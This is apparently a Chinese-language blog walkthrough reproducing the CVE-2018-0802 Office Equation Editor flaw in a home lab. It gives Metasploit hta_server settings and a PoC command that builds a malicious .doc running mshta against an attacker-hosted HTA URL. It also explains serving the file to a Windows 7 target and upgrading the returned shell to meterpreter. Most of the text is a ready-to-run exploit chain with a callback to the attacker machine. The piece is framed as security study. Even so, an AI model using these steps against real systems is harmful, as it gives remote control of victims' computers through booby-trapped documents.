CVE-2018-0802噩梦公式二代复现
一.环境搭建
攻击机:kali ip:192.168.43.79
靶机:windows7 x64+office2010
poc下载:https://github.com/Ridter/RTF_11882_0802
二.漏洞复现
1.打开msf,msfconsole
2.利用exploit/windows/misc/hta_server模块,并设置参数
use exploit/windows/misc/hta_server
set LHOST 192.168.43.79
set LPORT 8888
set SRVHOST 192.168.43.79
set target 1 (靶机是x86就设置为0)
3.查看设置是否有误,show options
4.运行生成hat,exploit
5.复制生成的hta链接
6.运行poc,python RTF_11882_0802.py -c "mshta http://192.168.43.79:8080/GhNxAVQlLTSBRZf.hta" -o DarkHQ.doc
mshta后面跟自己生成的hat链接
7.查看生成的doc文件,ls
8.这里为了方便就开启网页,然后用靶机下载
python -m SimpleHTTPServer 6666
靶机访问网站进行下载doc
9.靶机运行恶意doc(会提示你是否启用编辑,点启用就可以了)
10.返回kali,已经成功的返回了一个会话
11.切换到meterpreter,sessions -u 3 (这里我之前实验还反弹会了几个session,所以是3,可以通过sessions -i 查看你当前的session)
12.进入session,sessions -i 4
感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!